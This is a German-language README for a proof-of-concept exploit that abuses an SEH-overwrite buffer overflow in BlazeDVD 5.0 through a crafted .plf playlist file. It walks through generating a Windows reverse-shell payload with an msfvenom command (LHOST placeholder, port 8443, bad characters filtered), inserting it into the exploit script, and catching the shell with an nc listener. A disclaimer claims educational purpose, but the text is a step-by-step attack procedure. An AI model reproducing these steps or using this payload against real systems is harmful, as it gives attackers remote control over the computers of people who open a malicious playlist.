
Proof-of-Concept-Exploit (PoC), der eine Pufferüberlauf-Schwachstelle in BlazeDVD Version 5.0 über eine präparierte .plf-Playlist-Datei ausnutzt. Der Exploit verwendet SEH (Structured Exception Handler) Overwrite, um Codeausführung zu erreichen.
.plf-DateiDieser Code dient ausschließlich Bildungs- und Forschungszwecken. Jede missbräuchliche Verwendung dieses Codes kann gegen lokale oder internationale Gesetze verstoßen. Ich übernehme keine Verantwortung für Schäden, die durch unsachgemäße Verwendung entstehen.
Der Exploit erzeugt eine schädliche .plf-Datei, die beim Öffnen in BlazeDVD einen Pufferüberlauf auslöst und den SEH (Structured Exception Handler) überschreibt, wodurch die Ausführung auf eine Reverse-Shell-Payload umgeleitet wird.
Generieren Sie den Shellcode mit msfvenom
Verwenden Sie msfvenom, um eine Reverse-Shell-Payload im Rohformat zu erstellen und unerwünschte Zeichen zu vermeiden.
msfvenom -p windows/shell_reverse_tcp LHOST=YOUR_IP LPORT=8443 EXITFUNC=thread -b "\x00\x0a\x0d" -f c
Ersetzen Sie den Shellcode im Exploit-Skript durch die Ausgabe von msfvenom.
Netcat (Listener) starten In einem weiteren Terminal starten Sie einen Listener auf Port 8443:
nc -lvnp 8443
Fangen Sie die Reverse Shell Bei Erfolg verbindet sich eine Reverse Shell mit Ihrem Listener.